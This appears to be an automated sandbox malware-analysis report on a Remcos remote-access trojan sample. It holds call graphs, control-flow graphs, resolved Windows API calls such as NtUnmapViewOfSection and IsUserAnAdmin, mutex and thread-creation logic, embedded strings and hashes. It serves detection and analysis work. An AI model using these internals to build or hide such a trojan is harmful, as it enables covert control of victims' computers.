46358->46039 46359->46068 46360->46080 46361->46117 46362->46122 46363->46128 46364->46129 46365->46105 46366->46110 46367->46113 46368->46118 46369->45974 46371->45987 46604 418ccd 104 API calls 46373->46604 46375 4194b0 LoadResource LockResource SizeofResource 46374->46375 46376 40dd9e 46374->46376 46375->46376 46376->46228 46378 40209f 46377->46378 46386 4023ae 46378->46386 46380 4020aa 46390 4024ea 46380->46390 46382 4020b9 46382->46232 46384 402097 28 API calls 46383->46384 46385 406302 46384->46385 46385->46239 46387 402408 46386->46387 46388 4023b8 46386->46388 46387->46380 46388->46387 46397 402787 11 API calls std::_Deallocate 46388->46397 46391 4024fa 46390->46391 46392 402500 46391->46392 46393 402515 46391->46393 46398 402549 46392->46398 46408 4028c8 46393->46408 46396 402513 46396->46382 46397->46387 46419 402868 46398->46419 46400 40255d 46401 402572 46400->46401 46402 402587 46400->46402 46424 402a14 22 API calls 46401->46424 46404 4028c8 28 API calls 46402->46404 46407 402585 46404->46407 46405 40257b 46425 4029ba 22 API calls 46405->46425 46407->46396 46409 4028d1 46408->46409 46410 402933 46409->46410 46411 4028db 46409->46411 46433 402884 22 API calls 46410->46433 46414 4028e4 46411->46414 46416 4028f7 46411->46416 46427 402c8e 46414->46427 46417 4028f5 46416->46417 46418 4023ae 11 API calls 46416->46418 46417->46396 46418->46417 46420 402870 46419->46420 46421 402878 46420->46421 46426 402c83 22 API calls 46420->46426 46421->46400 46424->46405 46425->46407 46428 402c98 __EH_prolog 46427->46428 46434 402e34 22 API calls 46428->46434 46430 4023ae 11 API calls 46432 402d72 46430->46432 46431 402d04 46431->46430 46432->46417 46434->46431 46436 4020c7 46435->46436 46437 4023ae 11 API calls 46436->46437 46438 4020d2 46437->46438 46438->46266 46439->46266 46440->46266 46441->46256 46442->46267 46443->46271 46444->46276 46445->46274 46466 40f821 46446->46466 46449 40f55d 46544 40f7fb 46449->46544 46451 40f565 46549 40f44c 46451->46549 46453 40e651 46454 40f502 46453->46454 46455 40f510 46454->46455 46461 40f53f std::ios_base::_Ios_base_dtor 46454->46461 46554 4335cb 65 API calls 46455->46554 46457 40f51d 46458 40f44c 20 API calls 46457->46458 46457->46461 46459 40f52e 46458->46459 46555 40fbc8 77 API calls 6 library calls 46459->46555 46461->46285 46463 40f66b 46462->46463 46464 40f67e 46462->46464 46556 40f854 36 API calls 46463->46556 46464->46286 46473 40d2ce 46466->46473 46470 40f83c 46471 40e631 46470->46471 46472 40f663 36 API calls 46470->46472 46471->46449 46472->46471 46474 40d2ff 46473->46474 46475 43229f new 22 API calls 46474->46475 46476 40d306 46475->46476 46483 40cb7a 46476->46483 46479 40f887 46480 40f896 46479->46480 46518 40f8b7 46480->46518 46482 40f89c std::ios_base::_Ios_base_dtor 46482->46470 46486 4332ea 46483->46486 46485 40cb84 46485->46479 46487 4332f6 __EH_prolog3 46486->46487 46498 4330a5 46487->46498 46490 433332 46504 4330fd 46490->46504 46493 433314 46512 43347f 37 API calls _Atexit 46493->46512 46495 433370 std::locale::_Locimp::_Locimp_dtor 46495->46485 46496 43331c 46513 433240 21 API calls _Yarn 46496->46513 46499 4330b4 46498->46499 46501 4330bb 46498->46501 46514 442df9 EnterCriticalSection std::_Lockit::_Lockit 46499->46514 46502 4330b9 46501->46502 46515 43393c EnterCriticalSection 46501->46515 46502->46490 46511 43345a 22 API calls 2 library calls 46502->46511 46505 433107 46504->46505 46506 442e02 46504->46506 46507 43311a 46505->46507 46516 43394a LeaveCriticalSection 46505->46516 46517 442de2 LeaveCriticalSection 46506->46517 46507->46495 46510 442e09 46510->46495 46511->46493 46512->46496 46513->46490 46514->46502 46515->46502 46516->46507 46517->46510 46519 4330a5 std::_Lockit::_Lockit 2 API calls 46518->46519 46520 40f8c9 46519->46520 46539 40cae9 4 API calls 2 library calls 46520->46539 46522 40f8dc 46523 40f8ef 46522->46523 46540 40ccd4 77 API calls new 46522->46540 46524 4330fd std::_Lockit::~_Lockit 2 API calls 46523->46524 46525 40f925 46524->46525 46525->46482 46527 40f8ff 46528 40f906 46527->46528 46529 40f92d 46527->46529 46541 4332b6 22 API calls new 46528->46541 46542 436ec6 RaiseException 46529->46542 46532 40f943 46533 40f984 46532->46533 46543 43219b EnterCriticalSection LeaveCriticalSection WaitForSingleObjectEx __Init_thread_wait __Init_thread_footer 46532->46543 46533->46482 46539->46522 46540->46527 46541->46523 46542->46532 46545 43229f new 22 API calls 46544->46545 46546 40f80b 46545->46546 46547 40cb7a 41 API calls 46546->46547 46548 40f813 46547->46548 46548->46451 46550 40f469 46549->46550 46551 40f48b 46550->46551 46553 43aa1a 20 API calls 2 library calls 46550->46553 46551->46453 46553->46551 46554->46457 46555->46461 46556->46464 46560 40fd0e 46558->46560 46559 40fd3c 46559->46300 46560->46559 46566 40fe14 36 API calls 46560->46566 46563 40fce8 46562->46563 46565 40fcf3 46563->46565 46567 40fe79 36 API calls __EH_prolog 46563->46567 46565->46299 46566->46559 46567->46565 46569 40f4d0 46568->46569 46570 40f4d4 46568->46570 46573 40f44c 20 API calls 46569->46573 46576 40f30b 67 API calls 46570->46576 46572 40f4d9 46577 43a716 64 API calls 3 library calls 46572->46577 46575 40e5c5 46573->46575 46575->46304 46575->46305 46576->46572 46577->46569 46578->46308 46581 40328a 46579->46581 46580 4032a9 46580->46313 46581->46580 46582 4028c8 28 API calls 46581->46582 46582->46580 46584 4051db 46583->46584 46593 405254 46584->46593 46586 4051e8 46586->46316 46588 402041 46587->46588 46589 4023ae 11 API calls 46588->46589 46590 40205b 46589->46590 46598 40265a 46590->46598 46594 405262 46593->46594 46597 402884 22 API calls 46594->46597 46599 40266b 46598->46599 46600 4023ae 11 API calls 46599->46600 46601 40206d 46600->46601 46601->46319 46602->46327 46603->46332 46612 411253 61 API calls 46608->46612 46614 4406a8 _Atexit 46613->46614 46615 4406c0 46614->46615 46617 4407f6 _Atexit GetModuleHandleW 46614->46617 46635 442d9a EnterCriticalSection 46615->46635 46618 4406b4 46617->46618 46618->46615 46647 44083a GetModuleHandleExW 46618->46647 46619 440766 46636 4407a6 46619->46636 46622 4406c8 46622->46619 46624 44073d 46622->46624 46655 441450 20 API calls _Atexit 46622->46655 46625 440755 46624->46625 46656 441707 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46624->46656 46657 441707 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46625->46657 46626 440783 46639 4407b5 46626->46639 46627 4407af 46658 454909 5 API calls __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 46627->46658 46635->46622 46659 442de2 LeaveCriticalSection 46636->46659 46638 44077f 46638->46626 46638->46627 46660 4461f8 46639->46660 46642 4407e3 46644 44083a _Atexit 8 API calls 46642->46644 46643 4407c3 GetPEB 46643->46642 46645 4407d3 GetCurrentProcess TerminateProcess 46643->46645 46646 4407eb ExitProcess 46644->46646 46645->46642 46648 440864 GetProcAddress 46647->46648 46649 440887 46647->46649 46650 440879 46648->46650 46651 440896 46649->46651 46652 44088d FreeLibrary 46649->46652 46650->46649 46653 432d4b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 46651->46653 46652->46651 46654 4408a0 46653->46654 46654->46615 46655->46624 46656->46625 46657->46619 46659->46638 46661 44621d 46660->46661 46665 446213 46660->46665 46666 4459f9 46661->46666 46663 432d4b __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 46664 4407bf 46663->46664 46664->46642 46664->46643 46665->46663 46667 445a25 46666->46667 46668 445a29 46666->46668 46667->46668 46672 445a49 46667->46672 46673 445a95 46667->46673 46668->46665 46670 445a55 GetProcAddress 46671 445a65 __crt_fast_encode_pointer 46670->46671 46671->46668 46672->46668 46672->46670 46674 445ab6 LoadLibraryExW 46673->46674 46678 445aab 46673->46678 46675 445ad3 GetLastError 46674->46675 46676 445aeb 46674->46676 46675->46676 46679 445ade LoadLibraryExW 46675->46679 46677 445b02 FreeLibrary 46676->46677 46676->46678 46677->46678 46678->46667 46679->46676

                            Control-flow Graph

                            APIs
                            • LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A912
                            • LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A927
                            • GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A940
                            • GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A954
                            • GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                            • LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A980
                            • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                            • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                            • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                            • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                            • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                            • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                            • GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                            • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040D40C), ref: 0041AA0A
                            • GetProcAddress.KERNEL32(00000000), ref: 0041AA0D
                            • GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040D40C), ref: 0041AA1F
                            • GetProcAddress.KERNEL32(00000000), ref: 0041AA22
                            • LoadLibraryA.KERNEL32(Shlwapi.dll,0000000C,?,?,?,?,0040D40C), ref: 0041AA30
                            • GetProcAddress.KERNEL32(00000000), ref: 0041AA33
                            • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow,?,?,?,?,0040D40C), ref: 0041AA40
                            • GetProcAddress.KERNEL32(00000000), ref: 0041AA43
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule$LibraryLoad
                            • String ID: EnumDisplayDevicesW$EnumDisplayMonitors$GetComputerNameExW$GetConsoleWindow$GetModuleFileNameExA$GetModuleFileNameExW$GetMonitorInfoW$GetSystemTimes$GlobalMemoryStatusEx$IsUserAnAdmin$IsWow64Process$Kernel32.dll$NtUnmapViewOfSection$Psapi.dll$SetProcessDEPPolicy$SetProcessDpiAware$SetProcessDpiAwareness$Shell32$Shlwapi.dll$kernel32$kernel32.dll$ntdll.dll$shcore$user32
                            • API String ID: 551388010-2474455403
                            • Opcode ID: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                            • Instruction ID: 1e7ebd14e1f9a52016720e07cc743ec1e909bc11fdf6f09267ddb838bd68d733
                            • Opcode Fuzzy Hash: e80cee8c84c8c84204283680f0404711a146afcd0be7a07adf6e8d3a182e926f
                            • Instruction Fuzzy Hash: 9031EBF0E413587ADB207BBA5C09E5B3E9CDA80794711052BB408D3661FAFC9C448E6E

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 450 4407b5-4407c1 call 4461f8 453 4407e3-4407ef call 44083a ExitProcess 450->453 454 4407c3-4407d1 GetPEB 450->454 454->453 456 4407d3-4407dd GetCurrentProcess TerminateProcess 454->456 456->453
                            APIs
                            • GetCurrentProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407D6
                            • TerminateProcess.KERNEL32(00000000,?,0044078B,00000000,0046B4F8,0000000C,004408E2,00000000,00000002,00000000), ref: 004407DD
                            • ExitProcess.KERNEL32 ref: 004407EF
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CurrentExitTerminate
                            • String ID:
                            • API String ID: 1703294689-0
                            • Opcode ID: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                            • Instruction ID: 8c86c1f28e0fd2f6406888839527a8aea1509f7e03a0ffdd8510570f14deced8
                            • Opcode Fuzzy Hash: ab47e799b5bc4cc6dde358da0dc0a23fd4678ab9e3bf0635ceb4545ab71368f2
                            • Instruction Fuzzy Hash: 9AE04631000608ABEF017F20DD48A493B29EB40346F410029F9088B232CB3DED52CA89

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 7 40d3f0-40d45f call 41a8da call 40dd83 call 4020d6 * 2 call 419d87 call 40e563 call 401e6d call 43a300 24 40d461-40d4b5 call 40e609 call 401e45 call 401f8b call 40f98d call 40e5ba call 40dd70 call 401fb8 7->24 25 40d4b8-40d57f call 401e45 call 401f8b call 401e45 call 4052fe call 408209 call 401fc2 call 401fb8 * 2 call 401e45 call 401fa0 call 405a86 call 401e45 call 4051c3 call 401e45 call 4051c3 7->25 70 40d581-40d5c9 call 40822a call 401fc2 call 401fb8 call 401f8b call 411f34 25->70 71 40d5cf-40d5ea call 401e45 call 40fbab 25->71 70->71 105 40dd0f-40dd27 call 401f8b call 41239a call 410eda 70->105 80 40d656-40d679 call 401f8b CreateMutexA GetLastError 71->80 81 40d5ec-40d60d call 401e45 call 401f8b OpenMutexA 71->81 90 40d991-40d99a call 401fb8 80->90 91 40d67f-40d686 80->91 98 40d622-40d63f call 401f8b call 411f34 81->98 99 40d60f-40d61c WaitForSingleObject CloseHandle 81->99 110 40d9a1-40da01 call 434c30 call 40245c call 401f8b * 2 call 4120e8 call 408093 90->110 94 40d688 91->94 95 40d68a-40d6a7 GetModuleFileNameW call 4192ae 91->95 94->95 108 40d6b0-40d6b4 95->108 109 40d6a9-40d6ab 95->109 126 40d651 98->126 127 40d641-40d650 call 401f8b call 41239a 98->127 99->98 136 40dd2c 105->136 111 40d6b6-40d6c9 call 401e45 call 401f8b 108->111 112 40d717-40d72a call 401e45 call 401f8b 108->112 109->108 177 40da06-40da5f call 401e45 call 401f8b call 402073 call 401f8b call 41215f call 401e45 call 401f8b call 439867 110->177 111->112 140 40d6cb-40d6d1 111->140 142 40d731-40d7ad call 401e45 call 401f8b call 408093 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b 112->142 143 40d72c call 40e501 112->143 126->80 127->126 141 40dd31-40dd65 call 402073 call 4052dd call 402073 call 4194da call 401fb8 136->141 140->112 146 40d6d3-40d6d9 140->146 187 40dd6a-40dd6f call 413980 141->187 216 40d815-40d819 142->216 217 40d7af-40d7c8 call 401e45 call 401f8b call 439891 142->217 143->142 151 40d6f7-40d710 call 401f8b call 411eea 146->151 152 40d6db-40d6ee call 4060ea 146->152 151->112 175 40d712 call 4066a6 151->175 152->112 168 40d6f0-40d6f5 call 4067a0 152->168 168->112 175->112 221 40da61-40da63 177->221 222 40da65-40da67 177->222 216->110 220 40d81f-40d826 216->220 217->216 250 40d7ca-40d810 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5ed call 401ef3 call 401ee9 217->250 224 40d8a7-40d8b1 call 408093 220->224 225 40d828-40d8a5 call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 40b871 220->225 226 40da6b-40da7c call 41aa4f CreateThread 221->226 227 40da69 222->227 228 40da7e-40db48 call 402073 * 2 call 4194da call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 401e45 call 401f8b call 401e45 call 401f8b call 408f1f call 401e45 call 401f8b 222->228 235 40d8b6-40d8de call 40245c call 43254d 224->235 225->235 226->228 227->226 349 40db83-40db9a call 401e45 call 401f8b 228->349 350 40db4a-40db81 call 43229f call 401e45 call 401f8b CreateThread 228->350 256 40d8f0 235->256 257 40d8e0-40d8ee call 434c30 235->257 250->216 263 40d8f2-40d967 call 401ee4 call 43a796 call 40245c call 401f8b call 40245c call 401f8b call 412338 call 432556 call 401e45 call 40fbab 256->263 257->263 263->177 331 40d96d-40d98c call 401e45 call 419bca call 40de34 263->331 331->177 346 40d98e-40d990 331->346 346->90 359 40dbd9-40dbeb call 401e45 call 401f8b 349->359 360 40db9c-40dbd4 call 43229f call 401e45 call 401f8b CreateThread 349->360 350->349 371 40dc4c-40dc5e call 401e45 call 401f8b 359->371 372 40dbed-40dc47 call 401e45 call 401f8b call 401e45 call 401f8b call 40c5a1 call 401ef3 call 401ee9 CreateThread 359->372 360->359 383 40dc60-40dc94 call 401e45 call 401f8b call 401e45 call 401f8b call 439867 call 40b0a3 371->383 384 40dc99-40dcbf call 4195f8 call 401ef3 call 401ee9 371->384 372->371 383->384 404 40dcc1 384->404 405 40dcc4-40dcd7 CreateThread 384->405 404->405 408 40dce5-40dcec 405->408 409 40dcd9-40dce3 CreateThread 405->409 412 40dcfa-40dd01 408->412 413 40dcee-40dcf8 CreateThread 408->413 409->408 412->136 416 40dd03-40dd06 412->416 413->412 416->187 418 40dd08-40dd0d 416->418 418->141
                            APIs
                              • Part of subcall function 0041A8DA: LoadLibraryA.KERNELBASE(Psapi.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A8EF
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A8F8
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExA,?,?,?,?,0040D40C), ref: 0041A90F
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A912
                              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Psapi.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A924
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A927
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(Kernel32.dll,GetModuleFileNameExW,?,?,?,?,0040D40C), ref: 0041A93D
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A940
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040D40C), ref: 0041A951
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A954
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040D40C), ref: 0041A969
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A96C
                              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040D40C), ref: 0041A97D
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A980
                              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040D40C), ref: 0041A98C
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A98F
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040D40C), ref: 0041A9A1
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9A4
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040D40C), ref: 0041A9B1
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9B4
                              • Part of subcall function 0041A8DA: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040D40C), ref: 0041A9C5
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9C8
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040D40C), ref: 0041A9D5
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9D8
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040D40C), ref: 0041A9EA
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9ED
                              • Part of subcall function 0041A8DA: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040D40C), ref: 0041A9FA
                              • Part of subcall function 0041A8DA: GetProcAddress.KERNEL32(00000000), ref: 0041A9FD
                            • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 0040D603
                              • Part of subcall function 0040F98D: __EH_prolog.LIBCMT ref: 0040F992
                            Strings
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$HandleModule$LibraryLoad$H_prologMutexOpen
                            • String ID: (#G$0"G$0"G$0"G$Access Level: $Administrator$Exe$H"G$H"G$Inj$Remcos Agent initialized$Software\$User$`"G$exepath$licence$license_code.txt$origmsc$!G$!G$!G$!G$!G
                            • API String ID: 1529173511-1365410817
                            • Opcode ID: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                            • Instruction ID: a36e185f3bd9362bdba41541190492353975b392bf08c7d21c2bc217d0697d36
                            • Opcode Fuzzy Hash: 2dd69d7571eafc38791daeda20d7e1fab6605f3cb407cb475532d63618ebdb48
                            • Instruction Fuzzy Hash: 5622B960B043412BDA1577B69C67A7E25998F81708F04483FF946BB2E3EEBC4D05839E

                            Control-flow Graph

                            APIs
                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00471E90,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E18
                            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E23
                            • CloseHandle.KERNELBASE(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E2C
                            • closesocket.WS2_32(?), ref: 00404E3A
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E71
                            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E82
                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E89
                            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9A
                            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404E9F
                            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EA4
                            • SetEvent.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB1
                            • CloseHandle.KERNEL32(?,?,00000000,00471E90,00404C88,00000000,?,?,00000000,00471E90,00404AA9), ref: 00404EB6
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: CloseEventHandle$ObjectSingleWait$closesocket
                            • String ID:
                            • API String ID: 3658366068-0
                            • Opcode ID: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                            • Instruction ID: b890c501aeabc943cf782ca315c2c368517b908ebe77e8074f52597b82095e9a
                            • Opcode Fuzzy Hash: b1c96c5231e2cfca5084612c4e73afdaef55ac4315f506c78c7bb7997b29a698
                            • Instruction Fuzzy Hash: 1B212C71000B009FDB216B26DC49B17BBE5FF40326F114A2DE2E212AF1CB79E851DB58

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 437 445a95-445aa9 438 445ab6-445ad1 LoadLibraryExW 437->438 439 445aab-445ab4 437->439 441 445ad3-445adc GetLastError 438->441 442 445afa-445b00 438->442 440 445b0d-445b0f 439->440 445 445ade-445ae9 LoadLibraryExW 441->445 446 445aeb 441->446 443 445b02-445b03 FreeLibrary 442->443 444 445b09 442->444 443->444 448 445b0b-445b0c 444->448 447 445aed-445aef 445->447 446->447 447->442 449 445af1-445af8 447->449 448->440 449->448
                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue), ref: 00445AC7
                            • GetLastError.KERNEL32(?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000,00000364,?,004457F7), ref: 00445AD3
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00445A3C,?,00000000,00000000,00000000,?,00445D68,00000006,FlsSetValue,0045C110,0045C118,00000000), ref: 00445AE1
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID:
                            • API String ID: 3177248105-0
                            • Opcode ID: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                            • Instruction ID: dabcc1aa4f00c9d7d6140ee010913d89a9079070269616da1364236c98588597
                            • Opcode Fuzzy Hash: 6ca79951660ad3b6e96c8c42d18b75cc874aa2905662dd76989ddfa9726cc4c5
                            • Instruction Fuzzy Hash: 8501FC32601B276BDF218A78AC84D577758EF05B617110635F906E3242D724DC01C6E8

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 458 4459f9-445a23 459 445a25-445a27 458->459 460 445a8e 458->460 461 445a2d-445a33 459->461 462 445a29-445a2b 459->462 463 445a90-445a94 460->463 464 445a35-445a37 call 445a95 461->464 465 445a4f 461->465 462->463 468 445a3c-445a3f 464->468 467 445a51-445a53 465->467 469 445a55-445a63 GetProcAddress 467->469 470 445a7e-445a8c 467->470 471 445a70-445a76 468->471 472 445a41-445a47 468->472 473 445a65-445a6e call 432123 469->473 474 445a78 469->474 470->460 471->467 472->464 476 445a49 472->476 473->462 474->470 476->465
                            APIs
                            • GetProcAddress.KERNEL32(00000000,?), ref: 00445A59
                            • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00445A66
                            Memory Dump Source
                            • Source File: 0000000D.00000002.1401843225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_13_2_400000_xjXWSRbLn.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc__crt_fast_encode_pointer
                            • String ID:
                            • API String ID: 2279764990-0
                            • Opcode ID: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                            • Instruction ID: f797c493580bcbb57e031b514bcf368a6941c3076375826e2c1e25af396318bd
                            • Opcode Fuzzy Hash: c61b452eecc00867d96f211e5a9c10d9e28e8afd79249807e8935c7f12eaf234
                            • Instruction Fuzzy Hash: AA113A37A009319BAF21DE69ECC086B7391AB847247164332FC15BB346E634EC0286E9

                            Control-flow Graph

                            • Executed
                            • Not Executed
